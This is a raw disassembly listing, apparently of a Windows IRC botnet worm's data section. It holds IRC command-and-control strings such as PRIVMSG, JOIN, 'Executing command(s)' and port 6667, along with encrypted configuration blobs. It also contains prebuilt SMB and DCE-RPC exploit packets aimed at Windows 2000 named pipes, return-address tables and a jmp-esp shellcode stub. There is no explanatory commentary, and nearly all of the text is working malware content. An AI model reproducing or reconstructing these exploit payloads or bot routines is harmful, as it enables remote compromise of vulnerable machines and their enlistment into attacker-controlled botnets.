dword_419C4C dd 203A5049h, 2343003h, 2037325h, 0 ; DATA XREF: sub_40A9CF+B20�o
dword_419C5C dd 4B90h ; DATA XREF: sub_40A9CF+B0C�r
dd 0
dword_419C64 dd 155864D8h ; DATA XREF: sub_40A9CF+AE5�r
align 10h
dword_419C70 dd 22D988A0h ; DATA XREF: sub_40A9CF+AB4�r
dd 2 dup(0)
dword_419C7C dd 22DEDA78h ; DATA XREF: sub_40A9CF+A83�r
dd 2 dup(0)
dword_419C88 dd 0E53CCCE8h ; DATA XREF: sub_40A9CF+A5D�r
dd 3 dup(0)
dword_419C98 dd 0E53CD300h ; DATA XREF: sub_40A9CF+A11�r
dd 3 dup(0)
dword_419CA8 dd 5561C7F9h ; DATA XREF: sub_40A9CF+9DC�r
dd 3 dup(0)
dword_419CB8 dd 67270B61h ; DATA XREF: sub_40A9CF+9A1�r
dd 3 dup(0)
dword_419CC8 dd 1520A0h ; DATA XREF: sub_40A9CF+96C�r
dd 2 dup(0)
dword_419CD4 dd 0AE1FF760h ; DATA XREF: sub_40A9CF+937�r
dd 3 dup(0)
dword_419CE4 dd 2BAFD860h ; DATA XREF: sub_40A9CF+911�r
align 10h
dword_419CF0 dd 15D698h ; DATA XREF: sub_40A9CF+8FC�r
dd 2 dup(0)
dword_419CFC dd 0B8650h ; DATA XREF: sub_40A9CF+8C5�r
dd 2 dup(0)
dword_419D08 dd 4A38h ; DATA XREF: sub_40A9CF+87E�r
align 10h
aThisBuildIsBro db 'This build is broken and will not function properly.',0
; DATA XREF: sub_40A9CF:loc_40B1D8�o
align 4
aThisBuildIsFul db 'This build is fully functional',0 ; DATA XREF: sub_40A9CF+7FD�o
align 4
dword_419D68 dd 2343003h, 4B4F5242h, 2034E45h, 0 ; DATA XREF: sub_40A9CF:loc_40B1AD�o
dword_419D78 dd 2333003h, 2034B4Fh, 0 ; DATA XREF: sub_40A9CF+7D2�o
dword_419D84 dd 8Ah, 0 ; DATA XREF: sub_40A9CF+79E�o
dword_419D8C dd 0CD818BACh, 8196F4BDh, 0D6C3D39Ah, 0FDD3F9B9h, 0C8AAE7D9h
; DATA XREF: sub_40A9CF+790�o
dd 0E6FAEE95h, 0D8C5D3E2h, 2 dup(0)
dword_419DB0 dd 2E78970h ; DATA XREF: sub_40A9CF+77A�r
dd 2 dup(0)
dword_419DBC dd 0B7B3F8D0h ; DATA XREF: sub_40A9CF+753�r
dd 3 dup(0)
dword_419DCC dd 0C2C28390h ; DATA XREF: sub_40A9CF+6ED�r
dd 3 dup(0)
dword_419DDC dd 0AE9D81BBh, 839E9C8Fh, 0A4E7A68Fh, 0FEBE81C3h, 0DCEAF0A0h
; DATA XREF: sub_40A9CF+534�o
dd 0F1ECE3FEh, 2 dup(0)
dword_419DFC dd 81BEABBDh, 98B8B5BCh, 83D299B0h, 0E2A0A3F4h, 2 dup(0)
; DATA XREF: sub_40A9CF+448�o
aKnqQxjnuXxQEBZ db 'ªŸ¼Ÿ•†ž»ß•å¸šÉŸ¶…¿¡º°§µ…–¸Ã‹ªÓ‹°¼†¼‚±º±ŸÙ˜',0
; DATA XREF: sub_40A9CF+437�o
align 8
dword_419E48 dd 1FD30h ; DATA XREF: sub_40A9CF+410�r
align 10h
dword_419E50 dd 67294FA1h ; DATA XREF: sub_40A9CF+3E9�r
align 10h
dword_419E60 dd 67265A79h ; DATA XREF: sub_40A9CF+3BB�r
align 10h
dword_419E70 dd 38323166h, 2B636E65h, 20626166h, 72636564h, 65747079h
; DATA XREF: sub_40A9CF+39C�o
dd 3203A64h, 25023430h, 20373h
dword_419E90 dd 14705160h ; DATA XREF: sub_40A9CF+2C0�r
dd 2 dup(0)
dword_419E9C dd 38323166h, 2B636E65h, 20626166h, 72636E65h, 65747079h
; DATA XREF: sub_40A9CF+2A1�o
dd 3D203A64h, 2343003h, 2037325h, 0
dword_419EC0 dd 232320h ; DATA XREF: sub_40A9CF+1E3�o
dword_419EC4 dd 176C5160h ; DATA XREF: sub_40A9CF+18D�r
align 10h
dword_419ED0 dd 0AF99D8h ; DATA XREF: sub_40A9CF+158�r
dd 2 dup(0)
dword_419EDC dd 72727543h, 20746E65h, 646E6977h, 203A776Fh, 2343003h
; DATA XREF: sub_40A9CF+139�o
dd 2037325h, 0
dword_419EF8 dd 1D17950h ; DATA XREF: sub_40A9CF+106�r
dd 2 dup(0)
dword_419F04 dd 4B43494Eh, 732520h ; DATA XREF: sub_40A9CF+CC�o
; sub_40A9CF+EF�o ...
dword_419F0C dd 146E00h ; DATA XREF: sub_40A9CF+90�r
dd 2 dup(0)
dword_419F18 dd 1A80A5D1h ; DATA XREF: sub_40A9CF+69�r
dd 3 dup(0)
aLinkLink@linkP db 'link!link@link PRIVMSG %s :%s',0 ; DATA XREF: sub_40C93C+88�o
; sub_40D871+85F�o
align 4
asc_419F48: ; DATA XREF: sub_40C93C+30�o
; sub_40C93C+B5�o
unicode 0, <;>,0
asc_419F4C db '<=',0 ; DATA XREF: sub_40CA29:loc_40CE59�o
align 10h
asc_419F50 db '>=',0 ; DATA XREF: sub_40CA29:loc_40CE07�o
align 4
asc_419F54: ; DATA XREF: sub_40CA29:loc_40CDDB�o
dw 3Eh
unicode 0, <>,0
asc_419F58 db '!=',0 ; DATA XREF: sub_40CA29:loc_40CDAF�o
align 4
asc_419F5C db '==',0 ; DATA XREF: sub_40CA29:loc_40CD83�o
align 10h
aIpv6 db '$ipv6',0 ; DATA XREF: sub_40CA29:loc_40CC43�o
; sub_40CA29:loc_40CD58�o
align 4
aFirewall db '$firewall',0 ; DATA XREF: sub_40CA29:loc_40CC1F�o
; sub_40CA29:loc_40CD34�o
align 4
aLatency db '$latency',0 ; DATA XREF: sub_40CA29:loc_40CBFB�o
; sub_40CA29:loc_40CD10�o
align 10h
aFree db '$free',0 ; DATA XREF: sub_40CA29:loc_40CBD7�o
; sub_40CA29:loc_40CCEC�o
align 4
aVersion db '$version',0 ; DATA XREF: sub_40CA29:loc_40CBB1�o
; sub_40CA29:loc_40CCC6�o
align 4
aUptime db '$uptime',0 ; DATA XREF: sub_40CA29+158�o
; sub_40CA29+26D�o
a32s16s32s db '%32s %16s %32s',0 ; DATA XREF: sub_40CA29+EE�o
align 4
asc_419FAC db '&&',0 ; DATA XREF: sub_40CA29+9D�o
; sub_40CA29+45D�o
align 10h
asc_419FB0: ; DATA XREF: sub_40CA29+28�o
unicode 0, <)>,0
aExecutingComma db 'Executing command(s): %s',0 ; DATA XREF: sub_40CEB0+5C�o
align 10h
a6667 db '6667',0 ; DATA XREF: sub_40CF2F:loc_40CF60�o
align 4
aCSCCUCUSCCC db '%c%s%c%c%u%c%u%s%c%c%c',0 ; DATA XREF: sub_40D043+27B�o
; sub_40D871+431�o
align 10h
aG: ; DATA XREF: sub_40D043+1DC�o
; sub_40D871+392�o
unicode 0, <G>,0
aA: ; DATA XREF: sub_40D043+1C6�o
; sub_40D871+37C�o
unicode 0, <A>,0
aB: ; DATA XREF: sub_40D043+1B0�o
; sub_40D871+366�o
unicode 0, <B>,0
aUnk db 'UNK',0 ; DATA XREF: sub_40D043+160�o
; sub_40D871+316�o
aUserSSSS db 'USER %s %s %s :%s',0 ; DATA XREF: sub_40D043+E2�o
align 4
aPassS db 'PASS %s',0 ; DATA XREF: sub_40D043+3F�o
aNoticeS db 'NOTICE %s :',0 ; DATA XREF: sub_40D420+10�o
; sub_40D53F+37�o
aPrivmsgS db 'PRIVMSG %s :',0 ; DATA XREF: sub_40D4AB+10�o
; sub_40D53F+AF�o
align 4
dword_41A038 dd 1 ; DATA XREF: sub_40D53F:loc_40D680�o
dword_41A03C dd 7373656Dh, 20656761h, 0 ; DATA XREF: sub_40D53F:loc_40D629�o
dword_41A048 dd 49544F4Eh, 25204543h, 13A2073h, 0 ; DATA XREF: sub_40D53F+8F�o
dword_41A058 dd 56495250h, 2047534Dh, 3A207325h, 1 ; DATA XREF: sub_40D53F+63�o
aMirc db 'mIRC',0 ; DATA XREF: sub_40D734+6�o
; sub_40D74D:loc_40D76E�o
align 10h
asc_41A070: ; DATA XREF: sub_40D871+CB7�o
unicode 0, <*>,0
aNotice db 'NOTICE',0 ; DATA XREF: sub_40D871:loc_40E1C0�o
; sub_40E618+89�o
align 4
asc_41A07C db '][',0 ; DATA XREF: sub_40D871+807�o
; sub_40D871+88C�o
align 10h
a332 db '332',0 ; DATA XREF: sub_40D871:loc_40DF8E�o
aNick db 'NICK',0 ; DATA XREF: sub_40D871:loc_40DF3E�o
align 4
a@: ; DATA XREF: sub_40D871:loc_40DEBE�o
unicode 0, <@>,0
a302 db '302',0 ; DATA XREF: sub_40D871:loc_40DE96�o
; sub_40E618+33�o
a451 db '451',0 ; DATA XREF: sub_40D871:loc_40DE70�o
aUserhostS db 'USERHOST %s',0 ; DATA XREF: sub_40D871+5C4�o
; sub_40D871+5EE�o
aModeSXi db 'MODE %s +xi',0 ; DATA XREF: sub_40D871+571�o
a001 db '001',0 ; DATA XREF: sub_40D871:loc_40DD97�o
aModeSSmntu db 'MODE %s +smntu',0 ; DATA XREF: sub_40D871+515�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_40D871:loc_40DD25�o
align 4
aError db 'ERROR',0 ; DATA XREF: sub_40D871:loc_40DCFD�o
align 4
a433 db '433',0 ; DATA XREF: sub_40D871:loc_40DB2D�o
dword_41A0D8 dd 4950013Ah, 1474Eh ; DATA XREF: sub_40D871+290�o
dword_41A0E0 dd 4950013Ah, 474Eh ; DATA XREF: sub_40D871:loc_40DAEB�o
dword_41A0E8 dd 52455601h, 4E4F4953h, 1732520h, 0 ; DATA XREF: sub_40D871+265�o
aEggdropV1_6_16 db 'eggdrop v1.6.16',0 ; DATA XREF: sub_40D871:loc_40DAD1�o
dword_41A108 dd 52455601h, 4E4F4953h, 6E696C20h, 2576206Bh, 30252E64h
; DATA XREF: sub_40D871+24E�o
dd 73256433h, 69572820h, 2932336Eh, 1
dword_41A12C dd 4556013Ah, 4F495352h, 14Eh ; DATA XREF: sub_40D871+226�o
dword_41A138 dd 4556013Ah, 4F495352h, 4Eh ; DATA XREF: sub_40D871:loc_40DA81�o
aSend db 'SEND',0 ; DATA XREF: sub_40D871+CD�o
align 4
dword_41A14C dd 4344013Ah, 43h ; DATA XREF: sub_40D871+A6�o
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_40D871:loc_40D8DD�o
; sub_40D871+901�o ...
aMode db 'MODE',0 ; DATA XREF: sub_40D871:loc_40D8C2�o
align 4
aPong db 'PONG',0 ; DATA XREF: sub_40D871:loc_40D8A7�o
align 4
aPongS db 'PONG %s',0 ; DATA XREF: sub_40D871+25�o
aPing db 'PING',0 ; DATA XREF: sub_40D871+A�o
align 4
aLinkLink@link db 'link!link@link',0 ; DATA XREF: sub_40E618:loc_40E7A5�o
align 4
byte_41A18C db 41h ; DATA XREF: sub_40E979+3C�r
; sub_40EB4E+24�r ...
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 10h
dword_41A1D0 dd 3430032Dh, 3732502h, 30032E02h, 73250234h, 202D0203h
; DATA XREF: sub_4129CA+5C�o
dd 202E7525h, 20776152h, 6E617274h, 72656673h, 206F7420h
dd 63207325h, 6C706D6Fh, 2E657465h, 0
dd 1130h, 0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0F5h, 28h, 5Ch
dd 400DC28Fh, 5 dup(0)
dd 1, 0
dd 77777777h, 77777776h, 77777775h, 77F326C6h, 77F29267h
dd 77777772h, 77F9D463h, 750362C3h, 75035173h, 3 dup(717564B8h)
dd 71AB7BFBh, 773AD507h, 7C941EEDh, 77DB565Ch, 77FD1F89h
dd 2 dup(77E216B8h), 1130h, 0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0F5h, 28h, 5Ch
dd 400DC28Fh, 5 dup(0)
dd 1, 0
dd 0FFCA8166h, 6A52420Fh, 2ECD5802h, 745A053Ch, 5E21B8EFh
dd 0FA8B4A9Dh, 0AFEA75AFh, 0E7FFE775h, 0
dd 2 dup(4A9D5E21h), 0
dd 77777777h, 77777776h, 77777775h, 77F326C6h, 77F29267h
dd 77777772h, 77F32836h, 750362C3h, 75035173h, 3 dup(7C2FA0F7h)
dd 2 dup(71AB7BFBh), 7C941EEDh, 77E216B8h, 77FD1F89h, 2 dup(77E216B8h)
dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
aFxnbfxfxnbfxfx:
unicode 0, <FXNBFXFXNBFXFXFXFX>,0
align 4
db 0CCh
db 0E0h, 0FDh, 7Fh
db 0CCh
db 0E0h, 0FDh, 7Fh
align 8
dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dd 20h, 0
dd 20h, 5C005Ch, 0
dd offset sub_43005C
a12345611111111:
unicode 0, <$\123456111111111111111.doc>,0
align 10h
dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0
dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
dd 2180310h, 10016C6h, 100139Dh, 1001C55h, 1001C98h
dword_41A7A8 dd 5F5C0A0Dh, 2E2Fh ; DATA XREF: sub_410649+59�o
; sub_410B52+F�o
dword_41A7B0 dd 30B0005h, 10h, 48h, 0 ; DATA XREF: sub_410649+F�o
dd 16D016D0h, 0
dd 1, 10000h, 4D9F4AB8h, 11CF7D1Ch, 20001E86h, 577C6EAFh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_41A7FC dd 3000005h, 10h, 5 dup(0) ; DATA XREF: sub_410649+181�o
dword_41A818 dd 10005h, 2 dup(0) ; DATA XREF: sub_410649+1AD�o
dd 75757D58h, 47C6EB40h, 0A74E71BCh, 97B5D01Ch, 5 dup(0)
dd 90000h, 300h, 0
dd 300h, 5C005Ch, 0
dword_41A860 dd 0 ; DATA XREF: sub_410649+475�o
dd 2, 0
dd 1, 91C68h, 1, 2 dup(0)
dd 0C0h, 46000000h, 2 dup(1), 7
; ---------------------------------------------------------------------------
loc_41A894: ; DATA XREF: sub_410649+153�o
mov eax, [esp-4]
add eax, 0FFFFFAE0h
jmp eax
; ---------------------------------------------------------------------------
align 10h
loc_41A8A0: ; DATA XREF: sub_410649+E5�o
mov eax, [ebp+30h]
add eax, 0FFFFFB24h
jmp eax
; ---------------------------------------------------------------------------
align 4
loc_41A8AC: ; DATA XREF: sub_410649+202�o
jmp short loc_41A8BE
; ---------------------------------------------------------------------------
jmp short loc_41A8C9
; ---------------------------------------------------------------------------
dd 0
; ---------------------------------------------------------------------------
loc_41A8B4: ; DATA XREF: sub_410649+2DB�o
jmp short near ptr word_41A8BA
; ---------------------------------------------------------------------------
dw 0FFFFh
db 2 dup(0FFh)
word_41A8BA dw 0 ; CODE XREF: UPX1:loc_41A8B4�j
; ---------------------------------------------------------------------------
loc_41A8BC: ; DATA XREF: sub_410649+330�o
jmp short near ptr word_41A8C2
; ---------------------------------------------------------------------------
loc_41A8BE: ; CODE XREF: UPX1:loc_41A8AC�j
; UPX1:loc_41A8DC�j
jmp short loc_41A8C4
; ---------------------------------------------------------------------------
db 2 dup(0)
word_41A8C2 dw 0 ; CODE XREF: UPX1:loc_41A8BC�j
; ---------------------------------------------------------------------------
loc_41A8C4: ; CODE XREF: UPX1:loc_41A8BE�j
; DATA XREF: sub_410649+385�o
jmp short near ptr loc_41A8C9+1
; ---------------------------------------------------------------------------
dw 0FFFFh
db 0FFh
; ---------------------------------------------------------------------------
loc_41A8C9: ; CODE XREF: UPX1:0041A8AE�j
; UPX1:loc_41A8C4�j
inc dword ptr [eax]
; ---------------------------------------------------------------------------
db 0
off_41A8CC dd offset loc_41005C ; DATA XREF: sub_410649+449�o
dd 2 dup(0)
dword_41A8D8 dd 77F33723h ; DATA XREF: sub_410649+25A�o
; ---------------------------------------------------------------------------
loc_41A8DC: ; DATA XREF: sub_410649+286�o
jmp short loc_41A8BE
; ---------------------------------------------------------------------------
dw 7FFDh
; ---------------------------------------------------------------------------
loc_41A8E0: ; DATA XREF: sub_410649+22E�o
lahf
jnz short loc_41A8FB
loc_41A8E3: ; DATA XREF: sub_410649+13D�o
add [ecx+1Ch], bl
loc_41A8E6: ; CODE XREF: UPX1:loc_41A8F0�j
add [ecx], al
loc_41A8E8: ; DATA XREF: sub_410649+111�o
or ecx, [ebx]
sbb eax, [eax]
loc_41A8EC: ; DATA XREF: sub_410649+127�o
jmp short near ptr dword_41A8F4
; ---------------------------------------------------------------------------
align 10h
loc_41A8F0: ; DATA XREF: sub_410649+FB�o
jmp short loc_41A8E6
; ---------------------------------------------------------------------------
align 4
dword_41A8F4 dd 85000000h ; CODE XREF: UPX1:loc_41A8EC�j
; ---------------------------------------------------------------------------
call dword ptr [ebx+4Dh]
loc_41A8FB: ; CODE XREF: UPX1:0041A8E1�j
inc edx
jb short $+2
; ---------------------------------------------------------------------------
dw 0
dd 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h
dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h
dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h
dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h
dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h
dd 0
dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 4
dd 0
dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h, 240043h, 3F3F0000h, 3F3F3Fh, 0
dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dd offset loc_401495
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 2 dup(0)
; ---------------------------------------------------------------------------
sub sp, 71Ch
jmp esp
; ---------------------------------------------------------------------------
align 4
dd 1004600h, 7515123Ch, 751C123Ch, 42B68ABAh, 42D01E50h
dd 34000112h, 0
dd 150000h, 1B000106h, 20100h, 30C001Ch, 4002800h, 20008FFh
dd 10h, 0
dd 34EEA51Bh, 0
dd 12400h, 0
dword_41AF50 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_410B52+62�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_41AFDC dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_410B52+A2�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_0:
unicode 0, <Windows 2000 2195>,0
aWindows20005_1:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_41B088 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_410B52+E2�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_41B168 dd 3A000000h, 424D53FFh, 75h, 20011800h, 3 dup(0)
; DATA XREF: sub_410B52+13C�o
dd 0AB80000h, 46300800h, 0FF04h, 1000000h, 0F00h, 495C5C5Ch
dd 244350h, 3F3F3F3Fh, 3Fh
dword_41B1A8 dd 5C000000h, 424D53FFh, 0A2h, 20011800h, 3 dup(0)
; DATA XREF: sub_410B52+179�o
dd 4DC0800h, 400800h, 0DE00FF18h, 800DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 5C000903h, 574F5242h, 524553h, 0
dword_41B20C dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_410B52+1B9�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh
dd 3, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_41B2B0 dd 66030000h, 424D53FFh, 25h, 20011800h, 3 dup(0)
; DATA XREF: sub_410B52+216�o
dd 3900800h, 3C1D0800h, 1C000010h, 0E0040003h, 0FFh, 2 dup(0)
dd 1C004A00h, 2004A03h, 2600h, 5C032340h, 45504950h, 5005Ch
dd 100300h, 31C0000h, 0
dd 3040000h, 0
dd 4221001Fh, 184E8h, 0
dd 10000h, 0
dd 1630000h, 0
dd 1630000h, 0
dword_41B338 dd 0 ; DATA XREF: sub_410B52+2C7�o
dd 0D7h, 1, 0
dd 1, 0
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
align 4
dd 2 dup(0)
dword_41B35C dd 0CA040000h, 424D53FFh, 25h, 20011800h, 3 dup(0)
; DATA XREF: sub_410B52+348�o
dd 1C80800h, 7CC90800h, 80000010h, 0E0040004h, 0FFh, 2 dup(0)
dd 80004A00h, 2004A04h, 2600h, 5C048740h, 45504950h, 5005Ch
dd 100300h, 4800000h, 0
dd 4680000h, 0
dd 72B3001Fh, 1A381h, 0
dd 10000h, 0
dd 2150000h, 0
dd 2150000h, 0
dword_41B3E4 dd 0 ; DATA XREF: sub_410B52+3DE�o
dd 85h, 2, 0
dd 2, 2EBh, 85h, 2 dup(0)
dword_41B408 dd 20804h, 0 ; DATA XREF: sub_410B52+285�o
; sub_410B52+29B�o ...
dword_41B410 dd 2080Ah, 0 ; DATA XREF: sub_410B52+26F�o
dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h
dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h
dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h
dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h
dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h
dd 0
dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_1:
unicode 0, <Windows 2000 2195>,0
aWindows20005_2:
unicode 0, <Windows 2000 5.0>,0
align 4
dd 0
dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
